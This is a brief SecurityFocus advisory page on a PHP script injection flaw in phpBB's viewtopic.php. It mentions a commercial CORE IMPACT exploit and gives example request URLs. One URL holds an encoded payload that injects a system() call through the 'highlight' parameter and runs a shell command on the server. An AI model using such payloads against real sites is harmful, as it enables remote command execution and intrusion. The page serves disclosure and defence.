phpBB Viewtopic.PHP PHP Script Injection Vulnerability

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following example is available:

http://www.example.com/forums/viewtopic.php?t=[NUMBER HERE]&highlight=Bug,SELECT * FROM $table
http://www.example.com/viewtopic.php?t=29040&highlight=%2527%252esystem(chr(108)%252echr(115))%252e%2527

The following exploits are also available:


 

Privacy Statement
Copyright 2010, SecurityFocus